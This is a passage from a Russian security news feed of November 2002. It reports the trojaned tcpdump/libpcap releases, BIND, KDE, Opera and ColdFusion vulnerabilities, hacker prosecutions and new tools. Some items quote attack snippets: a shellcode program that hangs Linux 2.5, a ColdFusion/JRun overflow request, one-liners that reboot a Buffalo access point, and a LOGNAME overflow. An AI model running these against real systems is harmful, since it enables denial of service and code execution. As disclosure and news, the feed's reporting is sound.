установлено по 4096 процессоров Alpha с частотой 1,25 ГГц. В числе прочего стоит отметить 74-е место, занятое в списке отечественным суперкомпьютером МВС-1000 М, установленном в 2001 г. в Межотраслевом вычислительном центре в Москве Подробнее - http://www.compulenta.ru/2002/11/17/35459/
17/11/2002 18:17 Подробности взлома tcpdump.org.
Сегодня в списке рассылки [tcpdump-announce] Michael Richardson из Оттава (Канада) раскрыл подробности взлома сервера tcpdump.org, на котором были изменены исходники tcpdump и libpcap на их троянизированные версии. Как пишет Майкл, взлом был осуществлён в период с 7 по 10 ноября через уязвимость openssh-демона (его версия почему то не была пропатчена). После этого был добавлен дополнительный публичный ключ в файл .ssh/authorized_keys для логина Майкла. Этот эккаунт был использован 10:14am в понедельник 11 ноября для помещения заражённых файлов. Машина была переведена в оффлайн около 11 утра 13 ноября. После этого с личного ноутбука Майкла были помещены истинные файлы исходников, с правильной суммой MD5 и подписанные личным ключём Майкла. Предполагается (после возвращения Ричардсона с конференции IETF с Аталанты выпустить версию 3.7.1b или .2 без изменения исходного кода. Источник - http://www.securityfocus.com
16/11/2002 20:04 Палата представителей одобрила пожизненный срок для хакеров
Внесенное в последнюю минуту дополнение к законопроекту о Департаменте внутренней безопасности грозит злонамеренным компьютерным хакерам пожизненным тюремным заключением. В среду Палата представителей Конгресса США большинством голосов одобрила законопроект, который собирает значительную часть федеральной бюрократии под крышу нового департамента, объединяющего 22 существующих федеральных агентства, включая Секретную службу, Береговую охрану и Центр защиты национальной инфраструктуры ФБР. В ходе переговоров за закрытыми дверями перед началом дебатов руководство республиканской фракции добавило к законопроекту 16-страничный Акт по усилению мер кибербезопасности (Cyber Security Enhancement Act, CSEA), расширяющий права силовиков на прослушивание интернет- или телефонных коммуникаций без предварительного получения судебного ордера и накладывающий на интернет-провайдеров более широкие обязанности по информированию полиции. Более подоробно о CSEA - http://www.zdnet.ru/?ID=291619
16/11/2002 19:44 Первый альфа-релиз Вэб-интерфейса для сканеров Nessus и NMAP.
Команда Inprotect.com анонсировала выход первого альфа-релиза Вэб-интерфейса для сканеров Nessus и NMAP. Вышёл на условиях лицензии GNU GPL. Представляет интерес для системных администраторов, администраторов безопасности и просто пользователей Интернет. Собственно, именно он (судя по всему) был использован на сайте Inprotect.com для проверки своих (и не своих тоже) серверов на безопасность в онлайне. Доступен для скачивания - http://www.inprotect.com
16/11/2002 19:31 Статья "Security holes... Who cares?"
Eric Rescorla анонсировал выход статьи "Security holes... Who cares?", которая является своего рода исследованием того, как сетевое сообщество реагирует на уязвимости в программных продуктах. В качестве предмета исследования была выбрана известная уязвимость в OpenSSL. Исследовался период времени от момента объявления об уязвимости (июль 2002) до выхода червя, использующего эту уязвимость (сентябрь 2002). Выводы были сделаны на основании периодического анализа уязвимости определённого количества серверов. Результаты оказались довольно неутешительными. Администраторы довольно вяло обновляли ПО своих серверов - через 2 недели после объявления о дыре 2/3 серверов по-прежнему были уязвимы. В общем, это некий статистический документ, описывающий как, насколько быстро и насколько эффективно мировое сетевое сообщество реагирует на серьёзные уязвимости. Доступен в PDF и PS-форматах. PDF - http://www.rtfm.com/upgrade.pdf PS - http://www.rtfm.com/upgrade.ps
16/11/2002 19:23 Выпуск LEAF v.1.0.
Объявлено о выходе первой версии Linux Embedded Appliance Firewall (LEAF). Явлвется отличным инструментом для защиты сетей малого бизнеса, а также на домашних рабочих станциях под управлением Linux. Может использоваться в качестве файрволла для организации выхода в Интернет из интранет (внутренних) сетей. Версия 1.0 вышла после выпуска версий: 1 alpha, 4 beta и 4 rc. Анонс - http://leaf.sourceforge.net/article.php?sid=63
16/11/2002 18:52 Статья "Реверс-инжиниринг троянов Win32 в Linux".
Очередна статья об исследовании кодов троянцев, написанных для среды Win32 в Linux. Как пишет автор, все инструменты, описанные в статье являются фриварными. Среди них - IDA Pro Freeware Version, Wine (эмулятор среды Windows). Cобственно, IDA PRO запускается как раз из-под Wine, свободно доступного с сервера DataRescue. Статья - http://online.securityfocus.com/infocus/1641
16/11/2002 18:25 Вышла бета-версия Microsoft DirectX 9.0.
Корпорация Microsoft представила бета-версию пакета DirectX 9.0. Как сообщается в пресс-релизе, DirectX 9.0 включает в себя специально разработанные средства по улучшению производительности системы, функции по обеспечению безопасности и гибкие средства для работы с графикой, трехмерной анимацией и звуком. В настоящее время представленный пакет поддерживает полтора десятка языков – русский, английский, французский, немецкий, итальянский, японский, китайский и другие. DirectX 9.0 рассчитан на работу в операционных системах Windows 98/2000/Me/XP. Однако, бета-версия пакета, по всей видимости, содержит немало багов, в связи с чем DirectX 9.0 рекомендуется устанавливать на компьютеры с ОС Windows ME или Windows XP. Дело в том, что вышеназванный пакет не может быть деинсталлирован автоматически, в связи с чем пользователям перед его установкой придется воспользоваться функцией System Restore для сохранения предыдущего состояния системы. А эта функция, в свою очередь, реализована только лишь в вышеназванных операционных системах Windows ME и Windows XP. Скачать здесь - http://www.microsoft.com/downloads/release.asp?...
16/11/2002 17:33 Военных ограничили в применении беспроводных устройств.
Ввиду сомнений в безопасности применения технологий беспроводной передачи данных для обмена информацией, классифицируемой как секретная, в Министерстве Обороны США рекомендовано временно приостановить использование ряда беспроводных устройств и служб. Запрет не распространяется на применение сотовых телефонов, но использование устройств типа карманных органайзеров, позволяющих осуществлять беспроводной обмен данными, и в особенности непрерывно транслирующих сигналы без ведома пользователя, рекомендовано ограничить. Список "запрещенных" устройств уточняется; до выработки его окончательного варианта персоналу рекомендовано полагаться на здравый смысл. Источник - http://www.osp.ru
16/11/2002 17:15 Москва: самый крупный "улов" пиратских DVD-дисков.
В Москве на днях пресечена деятельность организованной преступной группы, занимавшейся сбытом контрафактных видеопрограмм в формате DVD в особо крупных размерах. Операция была проведена в Северо-восточном административном округе Москвы. Сотрудники УБОП ГУВД совместно с ОБЭП ГУ МВД России при участии специалистов Российской антипиратской организации обнаружили и изъяли на оптовом складе более 70 тыс. контрафактных дисков формата DVD и порядка 100 тыс. штук полиграфической упаковки к ним на общую сумму около $1 млн. По предварительной информации, сбыт "левой" аудиовизуальной продукции осуществлялся не только в Москве, но и в десяти с лишним российских регионах, а также в странах СНГ, Балтии и дальнего зарубежья. Источник - http://www.cnews.ru
16/11/2002 16:51 Mac OS X - раздолье для юниксоидов.
Компания Apple, выпустившая недавно новую операционную систему Mac OS X, не стесняется заявлять, что в ее основу была положена ОС Unix. Кроме того, глава компании Стив Джобс (Steve Jobs) всерьез решил научить пользователей работать с командной строкой Unix. Достаточно пользователю запустить терминальное приложение OS X, у них появляется возможность использовать потенциал Unix вместе с дружественным интерфейсом Aqua. Брайан Джепсон (Brian Jepson), соавтор книги "Mac OS X для Unix-чайников" (Mac OS X for Unix Geeks) считает, что большое количество задач гораздо легче выполнить в Unix-оболочке, нежели при помощи графического интерфейса. К примеру, в оболочке при помощи всего одной команды можно создать директории сколь угодно большой степени вложенности, в то время как в интерфейсе Aqua для этого потребуется значительно больше времени. Доступ к оболочке Unix осуществляется при помощи запуска терминальной программы - ее можно найти в директории "Приложения" (Applications), перейдя в поддиректорию "Утилиты" (Utilities). Источник - http://story.news.yahoo.com/
16/11/2002 16:24 Состоялся официальный релиз RTK.
15 Ноября состоялся официальный релиз RTK. Это русская операционная система для хакеров, офицеров безопасности и сетевых администраторов. RTK содержит последние версии порулярных digital security утилит. Он основан на Trinux (trinux.sourceforge.net), но этот факт не доказывает их идентичность. Система оптимизирована и дополнена, кроме того имеет встроенную поддержку русского языка и раскладки клавиатуры. Доступны русские man-пакеты, постоянно появляются обновления как самой операционной системы, так и пакетов, скриптов... Сама ОСь умещается на одной дискете 3.5", в RAM создается виртуальный раздел с которым и работает RTK. Есть возможность динамически подключать пакеты и/или модули, которых можно загрузить с дополнительных дискет, жестского диска, CD-R/RW, а также через сеть. Качайте, испытывайте, выдавайте свои пожелания авторам. Скачать ее можно по адресу - http://trinux.atanor.ru/mat/10 Источник - http://trinux.atanor.ru
15/11/2002 23:25 В МГУ начались преследования самовольно проложенных любительских сетей.
В общежитиях МГУ им. М.В.Ломоносова распространен приказ, запрещающий самовольную прокладку всяческих сетей, и грозящий административными карами создателям уже существующих. Приказ подписан Главным инженером МГУ директором ДИЭ МГУ Мишиным В.С., начальником службы связи МГУ Игошиным В.В., замом проректора - начальником УО МГУ Водолазским А.А (уж не автор ли это книги "Путь в Linux"?). Опасность уничтожения самовольно проложенных любительских сетей обсуждается в сообществе уже не первый год, однако до настоящего момента не было известно ни одного документированного случая такого рода преследований. Обращает на себя внимание и тот факт, что данным приказом начальник службы связи МГУ г-н Водолазский пытается закрепить монопольное право на прокладку коммуникаций за подразделением самого МГУ, исключив возможность проведения таких работ третьими лицами. Необходимо отметить, что этот пункт приказа прямол противоречит статьям 20 и 23 федерального Закона РФ "О связи" и, соответственно, может быть обжалован в судебном порядке. Подробности и текст приказа - http://www.provider.net.ru/news.php3?ts=1037350518
15/11/2002 17:15 Патч для защиты от ARP Spoofing.
На сервере securitylab выложен (уже давно) патч для ядра Linux, предотвращющий проведение подмены IP-адреса и MAC-адреса в локальной сети (технология ARP Spoofing). После применения патча в ядро добавляется новый sysctl-параметр: net.ipv4.neigh..arp_antidote. Может принимать значения от 0 до 3. 0-обычное состояние (ARP-кэш обновляется динамически), 1-3 - включение различных уровней защиты (вплоть до блокирования машины, которая пытается провести ARP Spoofing). Патч написан Ильёй Тетериным ака buggzy. Проверялся на ядрах 2.4.18 и .19. Патч - http://securitylab.ru/_tools/antidote2.diff.gz
15/11/2002 15:59 В США привлечены к ответственности шесть спамеров.
Американская Федеральная торговая комиссия в среду заявила о подаче иска в суд на шестерых жителей США, которые обвиняются в рассылке спама. Обвиняемые, по утверждению FTC, занимались массовыми рассылками электронных сообщений с предложением поучаствовать в незаконных онлайновых финансовых "пирамидах". Спамеры также занимались мошенничеством с кредитами и распространяли программы для фильтрации спама, которые, на самом деле, еще больше заполняли почтовые ящики пользователей непрошенными сообщениями. Судебные иски против спамеров стали частью программы Федеральной торговой комиссии по борьбе с незаконными почтовыми рассылками. В рамках этой программы FTC уже инициировала несколько судебных разбирательств в различных регионах США. В этой стране пока нет федеральных законов, запрещающих массовую рассылку электронных сообщений без разрешения получателей, и Федеральная Комиссия использует для борьбы со спамерами существующие нормативные акты, запрещающие нечестные методы ведения бизнеса. Источник - http://www.compulenta.ru/2002/11/15/35476/
15/11/2002 13:53 Пентагон развертывает систему тотального информационного слежения.
Американский Союз гражданских свобод потребовал от президента Буша прекратить ведущуюся Пентагоном разработку системы отслеживания платежей по кредитным картам. Пентагоном декларируется, что система призвана обнаруживать транзакции, проводящиеся террористами. Таким образом, создается крупнейшая в истории программа электронной слежки. "Если эта система будет развернута, каждый американец, будь то фермер из Небраски или банкир с Уолл-стрит, окажется под тотальным контролем электронных средств слежения аппарата государственной безопасности", - утверждает Лайза Мерфи, руководитель Союза гражданских свобод. Однако небезызвестное агенство DARPA уже начало заключать контракты на создание прототипа "Системы тотального информационного слежения". Прототип будет использовать статистический метод информационной проходки для поиска подозрительных моделей в потоке ежедневных транзакций. С корпорацией Booz Allen Hamilton уже заключен первый контракт стоимостью 62,9 млн. долларов США на воплощение нового проекта. Работы по реализации системы начались 7 ноября 2002 года. Источник - http://www.reuters.com
15/11/2002 13:34 ПО для организации покупок через Интернет по-прежнему уязвимо.
Программное обеспечение (ПО), при помощи которого оформляются и осуществляются покупки в Интернет (web shopping cart software) содержит уязвимость. Как указывает некто whitehat в BUGTRAQ для осуществления мошенничества достаточно применить нехитрую технологию. Цены на покупки между Вэб-страницами передаются при помощи полей скрытых форм (hidden form fields) и каждый раз, когда пользователь добавляет что-либо в свою корзину покупки (shopping cart), суммарная стоимость проверяется проверкой данных, передаваемых методом HTTP-POST, приходящих с компьютера ПОЛЬЗОВАТЕЛЯ. В данном случае уязвимость заключается в том, что до момента отправки суммарной стоимости на Вэб-сервер, пользователь может изменить эти данные локально (на своём компьютере), что позволяет пользователю самостоятельно (!) устанавливать цены товаров. Для осуществления описанной технологии достаточно установить (либо написать самому) небольшой плагин для Интернет-броузера, который позволял бы редактировать HTTP POST - данные до передачи на сервер. Некоторые сервера (например, www.cart32.com) проверяют поле HTTP Referer. Однако, как указывает автор, это поле тоже может быть изменено подобным образом. Среди производителей уязвимого ПО называются JustAddCommerce и Cart32. Источник - http://www.securityfocus.com
15/11/2002 11:12 Пропагандистские ресурсы чеченских сепаратистов подверглись анонимной экзекуции.
Агентство Reuters получило письмо от бывшего министра правительства Аслана Масхадова Мовлади Удугова, в котором тот жалуется на действия хакеров, предположительно работающих на ФСБ. Дело в том, что почти сразу после захвата заложников в "Норд-Осте", сайты Kavkaz.org и Chechenpress.com - пропагандистские ресурсы сепаратистов, хостящиеся в США, оказались недоступными. "Мы удивлены тем, что российские спецслужбы столь свободно чувствуют себя на территории США", - заявил Удугов в письме. Представители ФСБ, впрочем, категорически отрицают свою причастность мощным DoS-атакам, закрывшим доступ к Chechenpress.com, и ликвидации Kavkaz.org. Во втором случае хакеры пошли более трудным, но и более надёжным путём: кто-то перевёл регистрацию Удугова на себя и закрыл ресурс. Компания, предоставлявшая хостинг, подтверждает факт изменения регистрации и выясняет, не было ли это следствием взлома. Удугов открыл новый "Kavkaz.org" по адресу www.kavkazcenter.com, но и этот сайт в начале ноября "положили" с помощью DoS-атак. Стоит напомнить, что в самом начале этого года по новостным лентам прошло известие о том, что на Kavkaz.org давно и настойчиво охотится команда хакеров-любителей под названием "Сибирская сетевая бригада". Например, как сообщает KM.ru, в августе 1999 в разгар вторжения бандитов в Дагестан на главной странице kavkaz.org была помещена картинка Лермонтова с автоматом. Источник - http://www.securitylab.ru
15/11/2002 10:59 Руководство по разработке безопасных приложений.
После дискуссии в BUGTRAQ о неверной очистке памяти при компиляции программ в Windows (при использовании обнуления памяти функцией memset() и memcpy() эта строка при компиляции успешно игнорируется отладчиком - таким образом критичные данные остаются в памяти и могут быть прочитаны), Michael Bacarella, cистемный аналитик из Нью-Йорка, решил изложить свои мысли о том, как надо разрабатывать безопасные приложения. Статья доступна в форматах PDF, HTML, PostScript и DVI. Название статьи "The Peon's Guide To Secure System Development". Подробности - http://m.bacarella.com/papers/secsoft
15/11/2002 10:44 Уязвимости в Opera 7.
GreyMagic Software, известные нахождением багов во многих Интернет-броузерах, заявили, что в ещё не успевшей выйти версии броузера Opera 7 (вчера мы анонсировали выход первой "беты") обнаружены 2 уязвимости, которые приводят к возможности чтения любых локальных файлов и деректорий пользователя, а также кросс-сайтингу любого домена. Детали пока не раскрываются. Пользователям рекомендуют пока воздержаться от перехода на версию 7. В дополнению к этому сообщению, Тор Лархолм из PivX Solutions добавляет, что существует возможность доступа к посещённым пользователям страницам (history). Пришёл черёд выпуска Opera 7 beta2? ;) Источник - http://www.securityfocus.com
15/11/2002 10:05 Производители дистрибутивов обновляют BIND.
После объявления ISS о нахождении серьёзной уязвимости в BIND-реализации DNS-протокола на многих UNIX-системах, в BUGTRAQ разгорелась жаркая дискуссия о том, что основные производители BIND-фирма ISC не выпустила в кратчайшие сроки обновления версий BIND 4 и 8. Представители SuSe, заявили, что письмо в адрес Линды МакГинли (исполнительный директор ISC) в течении 36 часов осталось без ответа. В конце концов, ISC этой ночью были выпущены долгожданные патчи. Тем временем об обновлении версий BIND своих дистрибутивов объявили FreeBSD, SuSe и EnGarde Linux. В бюллетене SuSe высказывается мнение о возможности появления червей, использующих данную уязвимость. Обновлённые версии BIND - http://www.isc.org/products/BIND/patches/
14/11/2002 18:40 Уязвимость Buffalo WAP.
Андрей Михайловский из Arhont Ltd., занимающейся сетевой безопасностью, сообщил о наличии уязвимости в Buffalo Access Point, обеспечивающем доступ к беспроводным (WLAN) сетям. Cканирование устройства сканером nmap: nmap -sVVV -p 80 IP_Address_of_Buffalo_AP приводит к его перезагрузке (DoS). Уязвимость обнаружена на модели WLA-L11G Ver.2.31 с "прошивкой" WLI-PCM-L11G Ver.6.14. Подобный "баг" может быть использован удалённым атакующим после изменения конфигурации WAP для того, чтобы изменения вступили в силу. Также перезагрузить WAP можно, подключившись на 80 порт телнетом и выдав команду либо 'GET / HTTP/1.0', либо просто 'get ' (обязательно с пробелом после команды). Источник - http://www.securityfocus.com
14/11/2002 18:02 Первая бета-версия браузера Opera 7.
Компания Opera Software выпустила первую бета-версию новой, седьмой версии своего "самого быстрого на Земле" браузера. Как известно, в этом браузере используется совершенно новый движок, обеспечивающий более высокую скорость работы. Надо отметить, что скорость работы была на уровне и у шестой версии Opera, поэтому ускорения работы по сравнению с ней практически незаметно, во всяком случае на глаз. Возможно, однако, и то, что финальный релиз Opera 7 побьет все скоростные рекорды. Первое, что бросается в глаза при запуске Opera 7 - это обновленный пользовательский интерфейс. От Opera 6 унаследованы строка меню, панель Personal Bar (аналог "ссылок" в IE), да вечный рекламный баннер, обязательный для всех бесплатных версий Opera. Надписи под кнопками теперь видны не все время, а появляются только при наведении на них мыши. Вместо кнопок, соответствующих различным веб-страницам, теперь используются закладки, точно такие же как в браузере Mozilla. При желании закладку на страницу можно перетащить непосредственно на панель задач Windows. Таким образом, пользователь может сочетать одно- и многооконный интерфейс, что было нереально в случае с Opera 6. Заметные изменения коснулись и почтового клиента, получившего название M2. Доступ к почтовому ящику осуществляется через специальное меню Mail. В почтовом клиенте появилась функция быстрого поиска писем, аналогичная имеющейся в браузере Mozilla. В целом, почтовый клиент стал значительно удобнее, чем в Opera 6. С почтой теперь связана и боковая панель инструментов HotList, ранее использовавшаяся для управления закладками. Эта функция сохранилась за панелью и сейчас, однако теперь она играет роль области папок почтового клиента и по совместительству служит для управления окнами, в том числе, "специальными": списком посещенных страниц (History) и загрузкой файлов (Transfers). Cкачать (3.1 МБ) - http://www.opera.com/download/index.dml?opsys=windows&platform=windows...
14/11/2002 13:15 Руководство по настройке коммутаторов Cisco.
В качестве меры противодействия анонсированного ранее инструмента для выполнения ARP-атаки с обходом коммутаторов (свичей) (мы сообщали об этом вчера) Сивен Джилл (Stephen Gill) опубликовал руководство по настройке свичей/роутер производства CISCO от подобных атак. Доступно как в PDF, так и в HTML-формате. В HTML - http://www.qorbit.net/documents/catalyst-secure-template.htm В PDF - http://www.qorbit.net/documents/catalyst-secure-template.pdf
14/11/2002 13:05 Обновления ПО во FreeBSD.
Вчера в BUGTRAQ были выпущены 3 бюллетеня по безопасности от The FreeBSD Project с соответствующим обновлением пакетов (как в виде патчей, так и в виде портов). FreeBSD-SA-02:40.kadmind - фикс демона Керберос (kadmind - модули crypto_heimdal, crypto_kerberosIV, heimdal, krb5), FreeBSD-SA-02:41.smrsh - фикс ограниченного шелла sendmail smrsh (модуль contrib_sendmail), FreeBSD-SA-02:42.resolv - фикс в резолвере, используемом для работы с DNS-сообщениями (модуль libc). Источник - http://www.freebsd.org
14/11/2002 12:45 Обновление версии Apache для SGI IRIX.
SGI выпущен бюллетень по безопасности 20021105-01-I со ссылкой на SGI BUG 869356, в котором констатируется наличие уязвимости в версии Apache, поставляемой в составе ОС IRIX. Описаны 3 уязвимости: переполнение буфера в утилите ab, возможность повышение привилегий из-за некорректной обработки полномочий разделяемой памяти для scoreboard, возможность выполнения XSS через страницу ошибочного запроса Apache при использовании шаблонов DNS. Уязвима версия Апача до 1.3.27. Выпущен sgi_apache-1.3.27-BETA "patch". Также рекомендуется обновить версию IRIX до 6.5.19. Подробности - http://www.sgi.com/support/security/
14/11/2002 12:42 Ошибка установки TF флага в Linux 2.5.*
Вчера вечером с списке рассылки LKML появилось сообщения об обнаружении проблемы с обработкой флага трассировки в ядрах OS Linux ветви 2.5. Данная уязвимость позволяет локальному пользователю, путем запуска пользовательской программы (исходный код которой представлен ниже), вызвать полное зависание системы (включая невозможность работы с sysrq). int main( void ) { char dos[]="\x9C\x58\x0D\x00\x01\x00\x00\x50\x9D\x9A\x00\x00\x00\x00\x07\x00"; void (* f)( void ); f = (void *) dos; (* f)(); return 1; } Источник - lkml
14/11/2002 12:28 Уязвимость в Macromedia ColdFusion/JRun.
eEye Digital Security обнаружена уязвимость в Macromedia Coldfusion 6.0 и Macromedia JRun 4.0. Переключатели (handlers) IIS ISAPI содержат уязвимости, когда производят обработку введённого в поле URI именем файла. Если в качестве имени файла указать символы длиной более 4096 байт (при тестировании использовалось имя файла длиной 5000 байт), память "кучи" (heap memory) может быть переписана. При этом можно получить удалённо возможность выполнения команд с полномочиями SYSTEM. Используя уязвимость, удалённый атакующий может получить полный контроль над IIS-сервером, на котором запущены уязвимые версии Macromedia Coldfusion или JRun. Для выполнения атаки необходимо сформировать следующие запросы: Для JRUN - telnet example.com 80 GET /[+4096 byte buffer].jsp HTTP/1.0 [enter] [enter] Для Coldfusion: - telnet example.com 80 GET /[+4096 byte buffer].cfm HTTP/1.0 [enter] [enter] Производителем (Macromedia) выпущены соответствующие патчи для JRun и Coldfusion. В качестве ещё одного способа избежать взлома Вэб-сервера рекомендуется использовать выпускаемую eEye Digital Security версию IIS-сервера SecureIIS. Подробности - http://www.eEye.com/html/Research/Advisories/AD20021112.html
14/11/2002 11:53 Книга "The Unix Auditor's Practical Handbook".
Индийской фирмой Network Intelligence India Pvt. Ltd. написана книга под названием "The Unix Auditor's Practical Handbook". Книга содержит пошаговые инструкции по осуществлению аудита (администрирования) UNIX-сервера. Все советы/шаги, описанные в книге, привязаны к операционной системе фирмы SUN Solaris, однако общая идеология может быть применена также для таких ОС, как AIX & Linux. Вкратце содержание книги следующее: предварительные шаги, документация, физическая безопасность (безопасноть EEPROM в SUN-некий аналог BIOS), безопасность самой ОС, сетевая безопасность, безопасность файловой системы, безопасность пользователей и групп, встроенный SUN-аудитинг, бэкап и восстановление в экстренных случаях, инструменты автоматизации аудита. Книга представляет интерес для системных администраторов и администраторов по безопасности. Ссылка - http://www.nii.co.in/tuaph.html
14/11/2002 11:25 Крайние версии tcpdump/libpcap содержали трояна.
Сообщается, что версии популярного сниффера tcpdump, а также библиотеки libpcap содержали в себе троянца. Версии с закладками появились на tcpdump.org 11 ноября 2002г, 13 ноября доступ к ним командой разработчиков был перекрыт. Однако зеркала сайта до сих пор могут содржать заражённые версии. Закладки обнаружены в tcpdump v.3.6.2, 3.7.1 и libpcap 0.7.1. Троянец модифицирует конфигурационный скрипт, а также содержит исходник gencode.c (толко в libpcap). Конфигурационный скрипт загружался с сайта http://mars.raketti.net/~mash/services - он содержал внедрённый шелл-скрипт, который создавал С-файл и компилировал его. Программа соединялась с портом 1963 сайта 212.146.0.34 (mars.raketti.net) и читает один из трёх однобайтовых кодов статуса: A - выход из программы, B - вызов шелла, перенаправляющего запрос к существующему соединению 212.146.0.34, M - закрытие соединения, ожидание 3600 сек. и попытка нового соединения (позволяет в некоторых случаях обойти файрволлы). Gencode.c модифицирует исходник libpcap для скрытия траффика трояна. Заражение было обнаружено Houston Linux Users Group. На linux.org.ru написано, что версии библиотеки для Windows (WinPcap) и сниффера (WinDump) не содержат троянцев. Подробности - http://www.linuxsecurity.com/articles/hackscracks_article-6146.html
13/11/2002 16:53 Подробности о хакере "всех времён и народов".
Стали известны подробности о личности хакера, взломавшем 92 компьютерных сети Министерства Обороны США. Почему-то многие СМИ упорно называют его самым опасным хакером. Итак, 12 ноября 36-летний безработный программист из Лондона Гэри Маккиннон (Gary McKinnon) был обвинен федеральными судами Вирджинии и Нью- Джерси в восьми случаях компьютерного мошенничества и причинении ущерба на сумму порядка $900 тыс. - с учетом стоимости переустановки ПО на взломанных им компьютерах. В США действия Маккинона называют самым крупным взломом военных компьютеров за всю историю. Известно, что в течение года он украл пароли, стер файлы и отключил компьютерные сети на военных базах от Перл-Харбора до Коннектикута. Двум из приписываемых Маккиннону компьютерных взломов подвергся Пентагон. Другой случай произошел вскоре после событий 11 сентября на военно-морском объекте в Нью-Джерси. По информации ВВС, персонал этого объекта был настолько встревожен, что в результате компьютерная сеть, состоящая из трех сотен машин, была отключена на целую неделю. В целом же Маккиннону удалось взломать 92 компьютерные сети, принадлежащие военным и НАСА, в 14 штатах, а также 6 сетей частных компаний и организаций. Однако при этом власти подчеркивают, что хакер так и не получил доступа к секретной информации. Они также не считают, что его деятельность имела какое-либо отношение к терроризму. Предполагается, что Маккиннон действовал в одиночку. Если вину британца докажут, ему грозит тюремное заключение сроком до 10 лет и штрафы в размере $250 тыс. за каждый из восьми случаев мошенничества. В данный же момент самый крупный взломщик военных компьютеров, известный в интернете под "ником" SOLO, находится на свободе, хотя его и задерживали ненадолго британские власти. Источник - http://www.cnews.ru
13/11/2002 14:38 Серьёзные уязвимости в BIND!
Известная фирма и признанный лидер в исследовании безопасности ISS (Internet Security Systems) обнаружила существование сразу нескольких уязвимостей в BIND (Berkeley Internet Name Domain сервер) - самой известной и широкораспространённой реализации DNS-сервиса, используемого для преобразования легко-запоминающихся имён доменов и хостов (т.н. FQDN - Fully Qualified Domain Names) в IP-адреса (и наоборот в определённых случаях). От надёжности функционирования иеррахической структуры DNS-серверов во многом зависит функционирование самой сети Internet (достаточно вспомнить сколько шума вызвала недавняя атака на корневые DNS-сервера). Уязвимость присутствует в так называемой службе рекурсивных запросов. Обнаруженные три уязвимости включают в себя: возможность переполнения буфера в кешируемых ресурсных записях (RR - resource records) SIG с возможностью выполнения произвольного кода, возможность выполнения DoS при формировании запроса к ресурсным записям (RR) OPT, возможность выполнения DoS при попытке кеширования элементов SIG RR с неверным временем истечения полномочий (expiry time). Уязвимость обнаружена в версиях BIND 4 и BIND 8. Как указывается, по имеющимся сведениям, ни сама уязвимость, ни инструменты для её реализации пока неизвестны в компьютерном андэграунде, поэтому администраторам настоятельно рекомендуется как можно скорее обновить версии BIND, а также (по возможности) перекрыть периметр DNS-серверов при помощи фильтрации файрволлами траффика по 53 порту. Производитель BIND, фирма ISC уже выпустила версии ПО, не содержащие уязвимости - BIND v.4.9.11, 8.2.7, 8.3.4, а также BIND 9. Подробное описание - http://bvlive01.iss.net/issEn/...
13/11/2002 13:22 Уязвимость в KDE KIO.
Andreas Pour cообщает об обнаружении уязвимости в KIO-подсистеме для сетевой поддержки KDE. Сетевые протоколы в KIO комплектуются текстовыми файлами с расширением .protocol, расположенными в поддиректории shared/services/ основной директории инсталляции KDE (обычно /opt/kde). Реализации протоколов rlogin и telnet в KDE 2 обладают уязвимостью, позволяющей, при помощи специально сформированного URL в HTML-странице (HTML-почте или в других KIO-приложениях), выполнить произвольную команду в уязвимой системе с полномочиями UID пользователя. Атака может быть выполнена как локально, так и удалённо и выполнять операции, связанные с удалением файлов, доступом к важным системным файлам и установкой троянов. Пользователям KDE 3 версии рекомендуется обновиться до KDE 3.0.5, либо применить патч для KDE 3.0.4. Пользователям KDE 2 версии рекомендуют запретить протоколы rlogin, telnet для KIO, удалив соответствующие файлы rlogin.protocol, telnet.protocol. Подробности - http://www.kde.org/info/security/advisory-20021111-1.txt
13/11/2002 12:29 Уязвимость в Novell Netware.
Novell были опубликованы бюллетени по безопасности с номерами NOVL-2002-2963767, NOVL-2002-2963827, в которых говорится об обнаружении уязвимостей в ПО Netware. В первом бюллетене утверждается о наличии уязвимости в Novell eDirectory 8.6.2 для ОС Netware 5.x, 6.x, Windows NT 4, 2000. Рекомендуется применить Novell eDirectory 8.6.2 Support Pack 2a для Netware и NT\2000. Во втором бюллетене утверждается о наличии уязвимости в Netware 5.1 eDir v. 85.x (модули DS.NLM, DSREPAIR.NLM, NLDAP.NLM). Рекомендуется обновить eDirectory update для NetWare 5.1 с запущенной БД eDirectory 85.x d. В обоих случаях уязвимость (из-за неверной работы с механизмом полномочий) позволяет через Remote Manage удалённо войти пользователю с просроченным паролем. NOVL-2002-2963767 - http://support.novell.com/servlet/tidfinder/2963767 NOVL-2002-2963827 - http://support.novell.com/servlet/tidfinder/2963727
13/11/2002 12:08 Скрипт для проведения атаки IP Smartspoofing.
Ранее (на прошлой неделе) мы давали ссылку, описывающую технологию проведения атаки под названием IP Smartspoofing. Технология была изложена французской группой Althes и выложена для ознакомления членом команды Laurent Licour. На днях был опубликован инструмент для проведения этой атаки, написанный на Перле и носящий название smartspoof.pl. Для полноценной работы необходимо: linux 2.4 (тестировалось на РедХате 7.3), модуль Перла (получается из CPAN), пакет arp-sk (www.arp-sk.org), инструмент arp-fillup tool (доступен на самом французском сайте), iptables (входит в состав дистрибутива Linux c ядрами 2.4 - пришёл на смену ipchains). Собственно, сам скрипт представляет собой программу, соединяющую вместе вышеприведённые компоненты и упрощающий настройку и конфигурирование составных частей. В общем, качаем, проверяем, изучаем. :) Ccылка - http://www.althes.fr/ressources/avis/smartspoofing.htm#tools
13/11/2002 11:35 Уязвимость в KDE.
iDEFENSE, Inc. обнаружена уязвимость в популярном в UNIX-подобных ОС графическом десктопе KDE. Сетевая часть KDE cодержит модуль LISa, позволяющий определять CIFS (Common Internet File System) и другие файл-серверы в локальной сети. В свою очередь LISa сотоит из двух модулей: сетевого демона "lisa" и "resLISa" - ограниченной версии (restricted) cсетевого демона, созданной Alexander Neundorf. Оба демона доступны в KDE через вызов URL вида: "lan://" (lisa) и "rlan://" (resLISa). Уязвимость связана с тем, что resLISa некорректно обрабатывает переменную среды LOGNAME. При задании очень большого значения (например, при помощи команды $LOGNAME=`perl -e 'print "A"x5000'`) cуществует возможность переписи указателя инструкции с возможностью передачи управления над выполнимым файлом локальному пользователю. Это может привести к получению возможности повышения привилегий в системе. Доступ к "сырым" (raw) сокетам при выполнении подобной локальной атаки может привести к возможности прослушивания траффика злоумышленником, а также выполнения различных неавторизованных сетевых действий (сканирование, ARP-перенаправление, компрометация DNS). Уязвимость была обнаружена в KDE до версии 3.0.5. Новая версия KDE (3.0.5), а также пакет LISa 0.2.2 не содержат обнаруженной уязвимости. Подробности - http://www.idefense.com/advisory/11.11.02.txt
13/11/2002 11:05 Исследование приложений проникновения в беспроводные сети.
